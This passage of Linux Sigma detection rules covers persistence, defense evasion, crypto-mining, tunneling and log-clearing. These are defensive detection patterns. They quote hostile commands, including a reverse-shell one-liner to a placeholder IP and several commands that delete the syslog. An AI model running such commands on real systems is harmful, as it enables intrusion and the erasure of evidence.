Detects disabling security tools 8 | references: 9 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md 10 | author: Ömer Günal, Alejandro Ortuno, oscd.community 11 | date: 2020/06/17 12 | modified: 2022/11/26 13 | tags: 14 | - attack.defense_evasion 15 | - attack.t1562.004 16 | logsource: 17 | product: linux 18 | service: syslog 19 | detection: 20 | keywords: 21 | - 'stopping iptables' 22 | - 'stopping ip6tables' 23 | - 'stopping firewalld' 24 | - 'stopping cbdaemon' 25 | - 'stopping falcon-sensor' 26 | condition: keywords 27 | falsepositives: 28 | - Legitimate administration activities 29 | level: medium 30 | -------------------------------------------------------------------------------- /rules/linux/builtin/syslog/lnx_syslog_susp_named.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Named Error 2 | id: c8e35e96-19ce-4f16-aeb6-fd5588dc5365 3 | status: test 4 | description: Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts 5 | references: 6 | - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml 7 | author: Florian Roth (Nextron Systems) 8 | date: 2018/02/20 9 | modified: 2022/10/05 10 | tags: 11 | - attack.initial_access 12 | - attack.t1190 13 | logsource: 14 | product: linux 15 | service: syslog 16 | detection: 17 | keywords: 18 | - ' dropping source port zero packet from ' 19 | - ' denied AXFR from ' 20 | - ' exiting (due to fatal error)' 21 | condition: keywords 22 | falsepositives: 23 | - Unknown 24 | level: high 25 | -------------------------------------------------------------------------------- /rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious VSFTPD Error Messages 2 | id: 377f33a1-4b36-4ee1-acee-1dbe4b43cfbe 3 | status: test 4 | description: Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts 5 | references: 6 | - https://github.com/dagwieers/vsftpd/ 7 | author: Florian Roth (Nextron Systems) 8 | date: 2017/07/05 9 | modified: 2021/11/27 10 | tags: 11 | - attack.initial_access 12 | - attack.t1190 13 | logsource: 14 | product: linux 15 | service: vsftpd 16 | detection: 17 | keywords: 18 | - 'Connection refused: too many sessions for this address.' 19 | - 'Connection refused: tcp_wrappers denial.' 20 | - 'Bad HTTP verb.' 21 | - 'port and pasv both active' 22 | - 'pasv and port both active' 23 | - 'Transfer done (but failed to open directory).' 24 | - 'Could not set file modification time.' 25 | - 'bug: pid active in ptrace_sandbox_free' 26 | - 'PTRACE_SETOPTIONS failure' 27 | - 'weird status:' 28 | - 'couldn''t handle sandbox event' 29 | - 'syscall * out of bounds' 30 | - 'syscall not permitted:' 31 | - 'syscall validate failed:' 32 | - 'Input line too long.' 33 | - 'poor buffer accounting in str_netfd_alloc' 34 | - 'vsf_sysutil_read_loop' 35 | condition: keywords 36 | falsepositives: 37 | - Unknown 38 | level: medium 39 | -------------------------------------------------------------------------------- /rules/linux/file_event/file_event_lnx_doas_conf_creation.yml: -------------------------------------------------------------------------------- 1 | title: Linux Doas Conf File Creation 2 | id: 00eee2a5-fdb0-4746-a21d-e43fbdea5681 3 | status: stable 4 | description: Detects the creation of doas.conf file in linux host platform. 5 | references: 6 | - https://research.splunk.com/endpoint/linux_doas_conf_file_creation/ 7 | - https://www.makeuseof.com/how-to-install-and-use-doas/ 8 | author: Sittikorn S, Teoderick Contreras 9 | date: 2022/01/20 10 | modified: 2022/12/31 11 | tags: 12 | - attack.privilege_escalation 13 | - attack.t1548 14 | logsource: 15 | product: linux 16 | category: file_event 17 | detection: 18 | selection: 19 | TargetFilename|endswith: '/etc/doas.conf' 20 | condition: selection 21 | falsepositives: 22 | - Unlikely 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/linux/file_event/file_event_lnx_persistence_cron_files.yml: -------------------------------------------------------------------------------- 1 | title: Persistence Via Cron Files 2 | id: 6c4e2f43-d94d-4ead-b64d-97e53fa2bd05 3 | status: test 4 | description: Detects creation of cron file or files in Cron directories which could indicates potential persistence. 5 | references: 6 | - https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml 7 | author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC 8 | date: 2021/10/15 9 | modified: 2022/12/31 10 | tags: 11 | - attack.persistence 12 | - attack.t1053.003 13 | logsource: 14 | product: linux 15 | category: file_event 16 | detection: 17 | selection1: 18 | TargetFilename|startswith: 19 | - '/etc/cron.d/' 20 | - '/etc/cron.daily/' 21 | - '/etc/cron.hourly/' 22 | - '/etc/cron.monthly/' 23 | - '/etc/cron.weekly/' 24 | - '/var/spool/cron/crontabs/' 25 | selection2: 26 | TargetFilename|contains: 27 | - '/etc/cron.allow' 28 | - '/etc/cron.deny' 29 | - '/etc/crontab' 30 | condition: 1 of selection* 31 | falsepositives: 32 | - Any legitimate cron file. 33 | level: medium 34 | -------------------------------------------------------------------------------- /rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml: -------------------------------------------------------------------------------- 1 | title: Persistence Via Sudoers Files 2 | id: ddb26b76-4447-4807-871f-1b035b2bfa5d 3 | status: test 4 | description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user. 5 | references: 6 | - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2022/07/05 9 | modified: 2022/12/31 10 | tags: 11 | - attack.persistence 12 | - attack.t1053.003 13 | logsource: 14 | product: linux 15 | category: file_event 16 | detection: 17 | selection: 18 | TargetFilename|startswith: '/etc/sudoers.d/' 19 | condition: selection 20 | falsepositives: 21 | - Creation of legitimate files in sudoers.d folder part of administrator work 22 | level: medium 23 | -------------------------------------------------------------------------------- /rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml: -------------------------------------------------------------------------------- 1 | title: Potentially Suspicious Shell Script Creation in Profile Folder 2 | id: 13f08f54-e705-4498-91fd-cce9d9cee9f1 3 | status: experimental 4 | description: Detects the creation of shell scripts under the "profile.d" path. 5 | references: 6 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 7 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 8 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 9 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 10 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 11 | date: 2023/06/02 12 | tags: 13 | - attack.persistence 14 | logsource: 15 | product: linux 16 | category: file_event 17 | detection: 18 | selection: 19 | TargetFilename|contains: '/etc/profile.d/' 20 | TargetFilename|endswith: 21 | - '.csh' 22 | - '.sh' 23 | condition: selection 24 | falsepositives: 25 | - Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events. 26 | - Regular file creation during system update or software installation by the package manager 27 | level: low # Can be increased to a higher level after some tuning 28 | -------------------------------------------------------------------------------- /rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml: -------------------------------------------------------------------------------- 1 | title: Triple Cross eBPF Rootkit Default LockFile 2 | id: c0239255-822c-4630-b7f1-35362bcb8f44 3 | status: test 4 | description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running. 5 | references: 6 | - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2022/07/05 9 | modified: 2022/12/31 10 | tags: 11 | - attack.defense_evasion 12 | logsource: 13 | product: linux 14 | category: file_event 15 | detection: 16 | selection: 17 | TargetFilename: '/tmp/rootlog' 18 | condition: selection 19 | falsepositives: 20 | - Unlikely 21 | level: high 22 | -------------------------------------------------------------------------------- /rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml: -------------------------------------------------------------------------------- 1 | title: Triple Cross eBPF Rootkit Default Persistence 2 | id: 1a2ea919-d11d-4d1e-8535-06cda13be20f 3 | status: test 4 | description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method 5 | references: 6 | - https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2022/07/05 9 | modified: 2022/12/31 10 | tags: 11 | - attack.persistence 12 | - attack.defense_evasion 13 | - attack.t1053.003 14 | 15 | logsource: 16 | product: linux 17 | category: file_event 18 | detection: 19 | selection: 20 | TargetFilename|endswith: 'ebpfbackdoor' 21 | condition: selection 22 | falsepositives: 23 | - Unlikely 24 | level: high 25 | -------------------------------------------------------------------------------- /rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml: -------------------------------------------------------------------------------- 1 | title: Wget Creating Files in Tmp Directory 2 | id: 35a05c60-9012-49b6-a11f-6bab741c9f74 3 | status: experimental 4 | description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp" 5 | references: 6 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 7 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 8 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 9 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 10 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 11 | date: 2023/06/02 12 | tags: 13 | - attack.command_and_control 14 | - attack.t1105 15 | logsource: 16 | product: linux 17 | category: file_event 18 | detection: 19 | selection: 20 | Image|endswith: '/wget' 21 | TargetFilename|startswith: 22 | - '/tmp/' 23 | - '/var/tmp/' 24 | condition: selection 25 | falsepositives: 26 | - Legitimate downloads of files in the tmp folder. 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml: -------------------------------------------------------------------------------- 1 | title: Linux Reverse Shell Indicator 2 | id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871 3 | status: test 4 | description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') 5 | references: 6 | - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md 7 | author: Florian Roth (Nextron Systems) 8 | date: 2021/10/16 9 | modified: 2022/12/25 10 | tags: 11 | - attack.execution 12 | - attack.t1059.004 13 | logsource: 14 | product: linux 15 | category: network_connection 16 | detection: 17 | selection: 18 | Image|endswith: '/bin/bash' 19 | filter: 20 | DestinationIp: 21 | - '127.0.0.1' 22 | - '0.0.0.0' 23 | condition: selection and not filter 24 | falsepositives: 25 | - Unknown 26 | level: critical 27 | -------------------------------------------------------------------------------- /rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml: -------------------------------------------------------------------------------- 1 | title: Linux Crypto Mining Pool Connections 2 | id: a46c93b7-55ed-4d27-a41b-c259456c4746 3 | status: stable 4 | description: Detects process connections to a Monero crypto mining pool 5 | references: 6 | - https://www.poolwatch.io/coin/monero 7 | author: Florian Roth (Nextron Systems) 8 | date: 2021/10/26 9 | tags: 10 | - attack.impact 11 | - attack.t1496 12 | logsource: 13 | product: linux 14 | category: network_connection 15 | detection: 16 | selection: 17 | DestinationHostname: 18 | - 'pool.minexmr.com' 19 | - 'fr.minexmr.com' 20 | - 'de.minexmr.com' 21 | - 'sg.minexmr.com' 22 | - 'ca.minexmr.com' 23 | - 'us-west.minexmr.com' 24 | - 'pool.supportxmr.com' 25 | - 'mine.c3pool.com' 26 | - 'xmr-eu1.nanopool.org' 27 | - 'xmr-eu2.nanopool.org' 28 | - 'xmr-us-east1.nanopool.org' 29 | - 'xmr-us-west1.nanopool.org' 30 | - 'xmr-asia1.nanopool.org' 31 | - 'xmr-jp1.nanopool.org' 32 | - 'xmr-au1.nanopool.org' 33 | - 'xmr.2miners.com' 34 | - 'xmr.hashcity.org' 35 | - 'xmr.f2pool.com' 36 | - 'xmrpool.eu' 37 | - 'pool.hashvault.pro' 38 | - 'moneroocean.stream' 39 | - 'monerocean.stream' 40 | condition: selection 41 | falsepositives: 42 | - Legitimate use of crypto miners 43 | level: high 44 | -------------------------------------------------------------------------------- /rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml: -------------------------------------------------------------------------------- 1 | title: Communication To Ngrok Tunneling Service - Linux 2 | id: 19bf6fdb-7721-4f3d-867f-53467f6a5db6 3 | status: test 4 | description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors 5 | references: 6 | - https://twitter.com/hakluke/status/1587733971814977537/photo/1 7 | - https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent 8 | author: Florian Roth (Nextron Systems) 9 | date: 2022/11/03 10 | tags: 11 | - attack.exfiltration 12 | - attack.command_and_control 13 | - attack.t1567 14 | - attack.t1568.002 15 | - attack.t1572 16 | - attack.t1090 17 | - attack.t1102 18 | - attack.s0508 19 | logsource: 20 | product: linux 21 | category: network_connection 22 | detection: 23 | selection: 24 | DestinationHostname|contains: 25 | - 'tunnel.us.ngrok.com' 26 | - 'tunnel.eu.ngrok.com' 27 | - 'tunnel.ap.ngrok.com' 28 | - 'tunnel.au.ngrok.com' 29 | - 'tunnel.sa.ngrok.com' 30 | - 'tunnel.jp.ngrok.com' 31 | - 'tunnel.in.ngrok.com' 32 | condition: selection 33 | falsepositives: 34 | - Legitimate use of ngrok 35 | level: high 36 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_at_command.yml: -------------------------------------------------------------------------------- 1 | title: Scheduled Task/Job At 2 | id: d2d642d7-b393-43fe-bae4-e81ed5915c4b 3 | status: stable 4 | description: | 5 | Detects the use of at/atd which are utilities that are used to schedule tasks. 6 | They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code 7 | references: 8 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md 9 | author: Ömer Günal, oscd.community 10 | date: 2020/10/06 11 | modified: 2022/07/07 12 | tags: 13 | - attack.persistence 14 | - attack.t1053.002 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | Image|endswith: 21 | - '/at' 22 | - '/atd' 23 | condition: selection 24 | falsepositives: 25 | - Legitimate administration activities 26 | level: low 27 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_base64_decode.yml: -------------------------------------------------------------------------------- 1 | title: Decode Base64 Encoded Text 2 | id: e2072cab-8c9a-459b-b63c-40ae79e27031 3 | status: test 4 | description: Detects usage of base64 utility to decode arbitrary base64-encoded text 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md 7 | author: Daniil Yugoslavskiy, oscd.community 8 | date: 2020/10/19 9 | modified: 2021/11/27 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1027 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: '/base64' 19 | CommandLine|contains: '-d' # Also covers "--decode" 20 | condition: selection 21 | falsepositives: 22 | - Legitimate activities 23 | level: low 24 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_base64_execution.yml: -------------------------------------------------------------------------------- 1 | title: Linux Base64 Encoded Pipe to Shell 2 | id: ba592c6d-6888-43c3-b8c6-689b8fe47337 3 | status: experimental 4 | description: Detects suspicious process command line that uses base64 encoded input for execution with a shell 5 | references: 6 | - https://github.com/arget13/DDexec 7 | - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally 8 | author: pH-T (Nextron Systems) 9 | date: 2022/07/26 10 | modified: 2023/06/16 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1140 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection_base64: 19 | CommandLine|contains: 'base64 ' 20 | selection_exec: 21 | - CommandLine|contains: 22 | - '| bash ' 23 | - '| sh ' 24 | - '|bash ' 25 | - '|sh ' 26 | - CommandLine|endswith: 27 | - ' |sh' 28 | - '| bash' 29 | - '| sh' 30 | - '|bash' 31 | condition: all of selection_* 32 | falsepositives: 33 | - Legitimate administration activities 34 | level: medium 35 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml: -------------------------------------------------------------------------------- 1 | title: Linux Base64 Encoded Shebang In CLI 2 | id: fe2f9663-41cb-47e2-b954-8a228f3b9dff 3 | status: test 4 | description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded 5 | references: 6 | - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html 7 | - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS 8 | author: Nasreddine Bencherchali (Nextron Systems) 9 | date: 2022/09/15 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1140 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | CommandLine|contains: 19 | - "IyEvYmluL2Jhc2" # Note: #!/bin/bash" 20 | - "IyEvYmluL2Rhc2" # Note: #!/bin/dash" 21 | - "IyEvYmluL3pza" # Note: #!/bin/zsh" 22 | - "IyEvYmluL2Zpc2" # Note: #!/bin/fish 23 | - "IyEvYmluL3No" # Note: # !/bin/sh" 24 | condition: selection 25 | falsepositives: 26 | - Legitimate administration activities 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml: -------------------------------------------------------------------------------- 1 | title: Bash Interactive Shell 2 | id: 6104e693-a7d6-4891-86cb-49a258523559 3 | status: experimental 4 | description: Detects execution of the bash shell with the interactive flag "-i". 5 | references: 6 | - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 7 | - https://www.revshells.com/ 8 | - https://linux.die.net/man/1/bash 9 | author: '@d4ns4n_' 10 | date: 2023/04/07 11 | tags: 12 | - attack.execution 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: '/bash' 19 | CommandLine|contains: ' -i ' 20 | condition: selection 21 | falsepositives: 22 | - Unknown 23 | level: low 24 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml: -------------------------------------------------------------------------------- 1 | title: Enable BPF Kprobes Tracing 2 | id: 7692f583-bd30-4008-8615-75dab3f08a99 3 | status: experimental 4 | description: Detects common command used to enable bpf kprobes tracing 5 | references: 6 | - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ 7 | - https://bpftrace.org/ 8 | - https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html 9 | author: Nasreddine Bencherchali (Nextron Systems) 10 | date: 2023/01/25 11 | tags: 12 | - attack.execution 13 | - attack.defense_evasion 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | CommandLine|contains|all: 20 | - 'echo 1 >' 21 | - '/sys/kernel/debug/tracing/events/kprobes/' 22 | CommandLine|contains: 23 | - '/myprobe/enable' 24 | - '/myretprobe/enable' 25 | condition: selection 26 | falsepositives: 27 | - Unknown 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml: -------------------------------------------------------------------------------- 1 | title: BPFtrace Unsafe Option Usage 2 | id: f8341cb2-ee25-43fa-a975-d8a5a9714b39 3 | status: test 4 | description: Detects the usage of the unsafe bpftrace option 5 | references: 6 | - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ 7 | - https://bpftrace.org/ 8 | author: Andreas Hunkeler (@Karneades) 9 | date: 2022/02/11 10 | tags: 11 | - attack.execution 12 | - attack.t1059.004 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: 'bpftrace' 19 | CommandLine|contains: '--unsafe' 20 | condition: selection 21 | falsepositives: 22 | - Legitimate usage of the unsafe option 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml: -------------------------------------------------------------------------------- 1 | title: Capabilities Discovery - Linux 2 | id: d8d97d51-122d-4cdd-9e2f-01b4b4933530 3 | status: test 4 | description: Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other. 5 | references: 6 | - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes 7 | - https://github.com/carlospolop/PEASS-ng 8 | - https://github.com/diego-treitos/linux-smart-enumeration 9 | author: Nasreddine Bencherchali (Nextron Systems) 10 | date: 2022/12/28 11 | tags: 12 | - attack.discovery 13 | - attack.t1083 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | Image|endswith: '/getcap' 20 | CommandLine|contains: 21 | - ' /r ' 22 | - ' -r ' 23 | condition: selection 24 | falsepositives: 25 | - Unknown 26 | level: low 27 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml: -------------------------------------------------------------------------------- 1 | title: Cat Sudoers 2 | id: 0f79c4d2-4e1f-4683-9c36-b5469a665e06 3 | status: test 4 | description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights 5 | references: 6 | - https://github.com/sleventyeleven/linuxprivchecker/ 7 | author: Florian Roth (Nextron Systems) 8 | date: 2022/06/20 9 | modified: 2022/09/15 10 | tags: 11 | - attack.reconnaissance 12 | - attack.t1592.004 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: 19 | - '/cat' 20 | - 'grep' 21 | - '/head' 22 | - '/tail' 23 | - '/more' 24 | CommandLine|contains: ' /etc/sudoers' 25 | condition: selection 26 | falsepositives: 27 | - Legitimate administration activities 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml: -------------------------------------------------------------------------------- 1 | title: Remove Immutable File Attribute 2 | id: 34979410-e4b5-4e5d-8cfb-389fdff05c12 3 | related: 4 | - id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 5 | type: derived 6 | status: test 7 | description: Detects usage of the 'chattr' utility to remove immutable file attribute. 8 | references: 9 | - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html 10 | author: Nasreddine Bencherchali (Nextron Systems) 11 | date: 2022/09/15 12 | tags: 13 | - attack.defense_evasion 14 | - attack.t1222.002 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | Image|endswith: '/chattr' 21 | CommandLine|contains: ' -i ' 22 | condition: selection 23 | falsepositives: 24 | - Administrator interacting with immutable files (e.g. for instance backups). 25 | level: medium 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_clear_logs.yml: -------------------------------------------------------------------------------- 1 | title: Clear Linux Logs 2 | id: 80915f59-9b56-4616-9de0-fd0dea6c12fe 3 | status: stable 4 | description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md 7 | author: Ömer Günal, oscd.community 8 | date: 2020/10/07 9 | modified: 2022/09/15 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1070.002 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: 19 | - '/rm' # covers /rmdir as well 20 | - '/shred' 21 | - '/unlink' 22 | CommandLine|contains: 23 | - '/var/log' 24 | - '/var/spool/mail' 25 | condition: selection 26 | falsepositives: 27 | - Legitimate administration activities 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml: -------------------------------------------------------------------------------- 1 | title: Commands to Clear or Remove the Syslog 2 | id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 3 | status: test 4 | description: Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md 7 | author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC 8 | date: 2021/10/15 9 | modified: 2022/09/15 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1070.002 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | CommandLine|contains: 19 | - 'rm /var/log/syslog' 20 | - 'rm -r /var/log/syslog' 21 | - 'rm -f /var/log/syslog' 22 | - 'rm -rf /var/log/syslog' 23 | - 'unlink /var/log/syslog' 24 | - 'unlink -r /var/log/syslog' 25 | - 'unlink -f /var/log/syslog' 26 | - 'unlink -rf /var/log/syslog' 27 | - 'mv /var/log/syslog' 28 | - ' >/var/log/syslog' 29 | - ' > /var/log/syslog' 30 | condition: selection 31 | falsepositives: 32 | - Log rotation. 33 | level: high 34 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml: -------------------------------------------------------------------------------- 1 | title: Clipboard Collection with Xclip Tool 2 | id: ec127035-a636-4b9a-8555-0efd4e59f316 3 | status: test 4 | description: | 5 | Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. 6 | Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. 7 | references: 8 | - https://www.packetlabs.net/posts/clipboard-data-security/ 9 | author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC 10 | date: 2021/10/15 11 | modified: 2022/09/15 12 | tags: 13 | - attack.collection 14 | - attack.t1115 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | Image|contains: 'xclip' 21 | CommandLine|contains|all: 22 | - '-sel' 23 | - 'clip' 24 | - '-o' 25 | condition: selection 26 | falsepositives: 27 | - Legitimate usage of xclip tools. 28 | level: low 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml: -------------------------------------------------------------------------------- 1 | title: Copy Passwd Or Shadow From TMP Path 2 | id: fa4aaed5-4fe0-498d-bbc0-08e3346387ba 3 | status: experimental 4 | description: Detects when the file "passwd" or "shadow" is copied from tmp path 5 | references: 6 | - https://blogs.blackberry.com/ 7 | - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 8 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 9 | date: 2023/01/31 10 | tags: 11 | - attack.credential_access 12 | - attack.t1552.001 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection_img: 18 | Image|endswith: '/cp' 19 | selection_path: 20 | CommandLine|contains: '/tmp/' 21 | selection_file: 22 | CommandLine|contains: 23 | - 'passwd' 24 | - 'shadow' 25 | condition: all of selection_* 26 | falsepositives: 27 | - Unknown 28 | level: high 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml: -------------------------------------------------------------------------------- 1 | title: Crontab Enumeration 2 | id: 403ed92c-b7ec-4edd-9947-5b535ee12d46 3 | status: experimental 4 | description: Detects usage of crontab to list the tasks of the user 5 | references: 6 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 7 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 8 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 9 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 10 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 11 | date: 2023/06/02 12 | tags: 13 | - attack.discovery 14 | - attack.t1007 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | Image|endswith: '/crontab' 21 | CommandLine|contains: ' -l' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate use of crontab 25 | level: low 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml: -------------------------------------------------------------------------------- 1 | title: Remove Scheduled Cron Task/Job 2 | id: c2e234de-03a3-41e1-b39a-1e56dc17ba67 3 | status: test 4 | description: | 5 | Detects usage of the 'crontab' utility to remove the current crontab. 6 | This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible 7 | references: 8 | - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html 9 | author: Nasreddine Bencherchali (Nextron Systems) 10 | date: 2022/09/15 11 | tags: 12 | - attack.defense_evasion 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: 'crontab' 19 | CommandLine|contains: ' -r' 20 | condition: selection 21 | falsepositives: 22 | - Unknown 